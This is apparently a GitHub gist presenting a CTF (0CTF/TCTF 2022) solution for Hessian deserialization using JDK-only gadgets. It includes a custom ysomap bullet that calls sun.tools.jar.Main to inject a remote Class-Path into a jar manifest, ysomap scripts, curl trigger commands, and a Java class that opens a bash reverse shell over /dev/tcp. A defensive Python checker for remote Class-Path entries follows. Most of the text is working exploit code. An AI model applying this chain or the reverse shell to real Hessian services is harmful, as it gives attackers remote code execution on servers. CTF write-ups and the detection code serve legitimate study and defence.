@CykuTW
Last active July 10, 2023 11:21
My 0CTF/TCTF 2022 hessian-onlyjdk solution

I think I don't understand Java very well.

The intended solution looks much easier, but I didn't find it.

I found another, complicated solution to it instead.

The deserialization payloads are generated with ysomap (one custom bullet plus two ysomap scripts, shown below).

Step 1 uses sun.tools.jar.Main.main (the entry point of the JDK's `jar` tool, invoked by reflection from a SwingLazyValue) to create a jar file on the server. The entry-point argument of `jar cfe` is written into MANIFEST.MF without any check for line breaks, so a newline inside it lets me inject a Class-Path attribute that points at my own server.

Step 2 uses ysomap's built-in SwingLazyValueWithUrlClassLoaderBullet to load that jar (/tmp/myexploit.jar) through a URLClassLoader and instantiate a class from it. The class loader honours the injected Class-Path, fetches x.jar from my server, and the constructor of the malicious MyExploit class runs there.

# step 1

$ java -jar ysomap.jar script tools_jar.yso
$ curl -v http://127.0.0.1:8090 --data-binary '@payload.LazyValueForHessian.SwingLazyValueTestBullet.ser'

# step 2

# prepare x.jar
$ cat >MyExploit.java << EOF
public class MyExploit {
    public MyExploit() {
        try {
            // reverse shell to the listener on 127.0.0.1:8887 (local test setup)
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "bash -i >& /dev/tcp/127.0.0.1/8887 0>&1"});
        } catch (Exception e) {}
    }
}
EOF
$ javac MyExploit.java
$ jar cf x.jar MyExploit.class

# open http server (serves x.jar at the URL injected into the manifest in step 1; run it in another terminal)
$ python3 -m http.server 8888

# trigger URLClassLoader payload
$ java -jar ysomap.jar script url_class_loader.yso
$ curl -v http://127.0.0.1:8090 --data-binary '@payload.LazyValueForHessian.SwingLazyValueWithUrlClassLoaderBullet.ser'
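What step 1 leaves behind on the server, and a check for it. This is an added example, not part of the gist and not ysomap code: it constructs a jar whose manifest has the shape that `jar cfe /tmp/myexploit.jar "aaaa\nClass-Path: http://127.0.0.1:8888/x.jar" /etc/hosts` produces (the entry point lands in the Main-Class: attribute and the bare "\n" starts a new Class-Path: attribute; the Created-By value is a placeholder), then parses META-INF/MANIFEST.MF the way the JAR spec defines it, including the 72-byte continuation lines the jar tool emits, and flags Class-Path entries that resolve to a remote host or an absolute path. URLClassLoader follows those entries, which is exactly the pivot step 2 relies on, so a jar written from untrusted input should be checked like this before anything loads it.

```python
"""Flag remote Class-Path entries in a jar manifest (added example, not from the gist)."""
from __future__ import annotations

import io
import zipfile
from urllib.parse import urlsplit

# Constructed sample: the manifest shape that step 1's injected entry point produces.
# The jar tool writes CRLF line ends; the "\n" smuggled in through the entry-point
# argument is a bare LF, which manifest readers accept as a line break as well.
# Created-By depends on the JDK and is a placeholder here.
INJECTED_MANIFEST = (
    "Manifest-Version: 1.0\r\n"
    "Created-By: <jdk version placeholder>\r\n"
    "Main-Class: aaaa\n"
    "Class-Path: http://127.0.0.1:8888/x.jar\r\n"
    "\r\n"
)


def build_jar(manifest: str, files: dict[str, bytes]) -> bytes:
    """Build an in-memory jar (a zip) holding the given manifest plus extra files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def parse_manifest(text: str) -> dict[str, list[str]]:
    """Parse the main section of a JAR manifest into {name: [values]}.

    Per the JAR spec an attribute is "Name: value"; a line starting with a single
    space continues the previous value (the jar tool wraps at 72 bytes), and the
    first blank line ends the main section. Repeated names are kept as a list so
    duplicates stay visible instead of silently overwriting each other.
    """
    attrs: dict[str, list[str]] = {}
    last: str | None = None
    for line in text.splitlines():
        if line == "":
            break
        if line.startswith(" ") and last is not None:
            attrs[last][-1] += line[1:]      # continuation: drop only the leading space
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue                          # not an attribute line; ignore it
        value = value[1:] if value.startswith(" ") else value
        last = name.strip()
        attrs.setdefault(last, []).append(value)
    return attrs


def remote_class_path_entries(jar_bytes: bytes) -> list[str]:
    """Return Class-Path entries that do not stay relative to the jar's own location.

    Class-Path is a space-separated list of URLs resolved against the jar's URL.
    Anything carrying a scheme or host (http://..., file://host/...) or an absolute
    path is reported; plain relative names such as lib/util.jar are left alone.
    """
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        if "META-INF/MANIFEST.MF" not in zf.namelist():
            return []
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", errors="replace")
    flagged: list[str] = []
    for value in parse_manifest(text).get("Class-Path", []):
        for entry in value.split():
            parts = urlsplit(entry)
            if parts.scheme or parts.netloc or entry.startswith("/"):
                flagged.append(entry)
    return flagged


if __name__ == "__main__":
    sample = build_jar(INJECTED_MANIFEST, {"hosts": b"127.0.0.1 localhost\n"})
    for entry in remote_class_path_entries(sample):
        print("remote Class-Path entry:", entry)
```

Run against a real jar by reading its bytes into remote_class_path_entries(); the parser keeps duplicate attribute names as a list on purpose, since a second Main-Class: or Class-Path: in the main section is itself a sign that something wrote attacker-controlled text into the manifest.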
SwingLazyValueTestBullet.java (custom ysomap bullet used in step 1):

package ysomap.bullets.jdk;

import sun.swing.SwingLazyValue;
import ysomap.bullets.AbstractBullet;
import ysomap.bullets.Bullet;
import ysomap.common.annotation.*;

@Bullets
@Dependencies({"jdk"})
@Details("Test")
@Targets({Targets.HESSIAN})
public class SwingLazyValueTestBullet extends AbstractBullet<SwingLazyValue> {

    @Override
    public SwingLazyValue getObject() throws Exception {
        // SwingLazyValue.createValue() invokes the named static method by reflection,
        // so on the server this runs: jar cfe /tmp/myexploit.jar <entry-point> /etc/hosts
        String classname = "sun.tools.jar.Main";
        String methodName = "main";
        Object[] evilargs = new Object[]{
            new String[] {
                "cfe",                  // create a jar, write it to a file, set its entry point
                "/tmp/myexploit.jar",
                // the entry point is copied into MANIFEST.MF verbatim; the "\n" starts a new
                // manifest line, injecting a Class-Path that points at the attacker's x.jar
                "aaaa\nClass-Path: http://127.0.0.1:8888/x.jar",
                "/etc/hosts"            // any readable file, just so the jar has some content
            }
        };
        return new SwingLazyValue(classname, methodName, evilargs);
    }

    public static Bullet newInstance(Object... args) throws Exception {
        Bullet bullet = new SwingLazyValueTestBullet();
        return bullet;
    }
}
tools_jar.yso:

use payload LazyValueForHessian
set serializeType hessian2
use bullet SwingLazyValueTestBullet
run

url_class_loader.yso:

use payload LazyValueForHessian
set serializeType hessian2
use bullet SwingLazyValueWithUrlClassLoaderBullet
set filepath /tmp/myexploit.jar
set evilClass MyExploit
run